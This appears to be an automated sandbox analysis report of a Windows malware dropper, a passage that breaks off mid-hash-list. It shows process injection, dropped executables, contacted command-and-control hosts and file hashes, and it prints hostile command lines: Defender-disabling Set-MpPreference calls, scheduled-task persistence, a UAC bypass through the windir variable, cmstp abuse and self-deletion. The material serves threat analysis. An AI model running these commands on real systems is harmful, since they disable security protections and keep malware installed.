PID 3620 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3620 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3856 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3856 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3856 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 212 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
PID 212 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
PID 212 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
PID 212 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe
PID 212 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe
PID 212 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe
PID 212 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
PID 212 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
PID 212 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
PID 212 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
PID 212 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
PID 212 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
PID 212 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
PID 212 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
PID 212 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
PID 212 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 212 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 212 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1344 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1344 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\mobsync.exe
PID 3524 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\cmd.exe
PID 3524 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\cmd.exe
PID 3524 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe C:\Windows\SysWOW64\cmd.exe
PID 1264 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 3620 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\852648917343331\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 3620

C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe

"C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe"

C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe

"C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe"

C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe

"C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe"

C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe

"C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe"

C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

"C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\mobsync.exe

C:\Windows\System32\mobsync.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "

C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe

"C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDD03.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\i2gwbrqy.inf

C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe

"{path}"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Windows\temp\h3gk1fsv.exe

C:\Windows\temp\h3gk1fsv.exe

C:\Windows\temp\h3gk1fsv.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 45.67.231.40:80 45.67.231.40 tcp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 icando.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp

Files

memory/3728-116-0x0000000000680000-0x0000000000681000-memory.dmp

memory/2724-117-0x0000000000000000-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/3172-122-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/2724-127-0x00000000004D0000-0x00000000004D1000-memory.dmp

memory/3172-128-0x00000000007C0000-0x00000000007C1000-memory.dmp

memory/212-129-0x000000000044003F-mapping.dmp

memory/3728-130-0x0000000003550000-0x0000000003558000-memory.dmp

memory/3620-131-0x0000000000417A8B-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1392-133-0x000000000041A684-mapping.dmp

memory/212-136-0x00000000005E0000-0x000000000072A000-memory.dmp

memory/212-135-0x0000000000400000-0x0000000000495000-memory.dmp

memory/3620-137-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3620-138-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/1392-139-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1392-140-0x0000000002010000-0x0000000002011000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

memory/3856-150-0x0000000000000000-mapping.dmp

memory/8-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/3732-152-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/3524-155-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

C:\Users\Admin\AppData\Local\Temp\INNff8Vdy3.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/3732-158-0x0000000000200000-0x0000000000201000-memory.dmp

memory/3728-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
